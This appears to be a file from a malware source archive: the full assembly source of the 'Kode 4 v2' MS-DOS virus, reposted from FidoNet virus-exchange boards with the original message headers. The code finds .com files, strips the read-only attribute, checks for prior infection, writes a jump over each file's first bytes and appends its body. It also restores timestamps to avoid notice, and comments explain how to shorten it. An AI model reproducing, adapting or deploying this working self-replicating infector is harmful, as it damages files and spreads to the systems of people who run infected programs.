MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir63.asm
2021-01-12 18:07:35 -06:00

223 lines
7.5 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 53 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : KOD4_399.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 17:58)
;* To : Mikko Hypponen
;* Subj : KOD4_399.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mark.Hapershaw@f718.n283.z2.fidonet.org
;ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92
;
;Article Title: Kode 4 v2 Virus
;Author: Soltan Griss
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
V_Length equ vend-vstart
KODE4 proc far
start label near
db 0E9h,00h,00h
vstart equ $
mov si,100h ;get si to point to 100
mov di,102h ;get di to point to 102
lback: inc di ;increment di
mov ax,word ptr [si] ;si is ponting to ax
cmp word ptr [di],ax ;compare ax with di loc
jne lback ;INE go back and inc di
mov ax,word ptr [si+1]
cmp ax,word ptr [di+1]
je lout
jmp lback
lout: add di,3h ;jmp stored in the end
sub di,(v_length+100h) ;+3 to get to end and -
mov si,di ;
;**********************************************************************
;*
;* The above code can be re-written as follows...
;* The above idea, although it works is very long in code....
;* when DOS does a load and execute it pushes all registers the last
;* register to be pushed contains the file length. so just subtract
;* the current location
;**********************************************************************
;
;
;
;Host_Off: pop bp
; sub bp,offset host_off
; mov si,bp
;
;*** Before opening any file copy the original three bytes back to 100h
;*** Because they will get overwritten when you check any new files
lea di,temp_buff
add di,si
mov ax,word ptr [di]
mov cl,byte ptr [di+2]
mov di,100h
mov word ptr [di],ax
mov byte ptr [di+2],cl
mov ah,4Eh ;Find first Com file
mov dx,offset filename ; offset of "*.com"
add dx,si
int 21h
jnc back
jmp done
Back:
mov ah,43h ;get rid of read only
mov al,0
mov dx,9eh
int 21h
mov ah,43h
mov al,01
and cx,11111110b
int 21h
mov ax,3D02h ;Open file for read/writing
mov dx,9Eh ;get file name from file DTA
int 21h
jnc next
jmp done
next: mov bx,ax ;save handle in bx
mov ah,57h ;get time date
mov al,0
int 21h
push cx ;put in stack for later
push dx
mov ax,4200h ; Move ptr to start of file
xor cx,cx
xor dx,dx
int 21h
mov ah,3fh ;load first 3 bytes
mov cx,3
mov dx,offset temp_buff
add dx,si
int 21h
xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax,4202h
int 21h
sub ax,3 ; Fix for real location
push ax
; nop ;
; nop ; used for debugging
; nop ;
; nop ;
; nop
mov di,offset temp_buff
add di,si
mov word ptr [j_code2+si],ax; Save two bytes in a
; word [jumpin]
cmp byte ptr [di],0e9h ;look for a jmp at begining
jne infect
mov cx,word ptr [di+1] ;check for XXX bytes at end
pop ax
sub ax,v_length
cmp ax, cx ; jump (id string to check)
jne infect
jmp finish
infect:
xor cx,cx ;move file pointer to begining
xor dx,dx ;to write jump
mov ax,4200h
int 21h
mov ah,40h ;write jump in first 3 bytes
mov cx,3
mov dx, offset j_code1
add dx,si
int 21h
xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax, 4202h
int 21h
mov dx,offset vstart
add dx,si ;Start writing at top of virus
mov cx,(vend-vstart) ; Set for length of virus
mov ah,40h ;Write Data into the file
int 21h
Finish: pop dx ;Restore old dates and times
pop cx
mov ah,57h
mov al,01h
int 21h
mov ah,3Eh ;Close the file
int 21h
mov ah,4Fh ;Find Next file
int 21h
jc done
jmp back
done:
mov bp,100h
jmp bp
filename db "*.com",0
DATA db " -=+ Kode4 +=-, The one and ONLY!$"
j_code1 db 0e9h
j_code2 db 00h,00h
temp_buff db 0cdh,020h,090h ; CD 20 NOP
kode4 endp
vend equ $
seg_a ends
end start
;-+- WM v2.09/91-0245
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/3 Enable 32-bit processing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)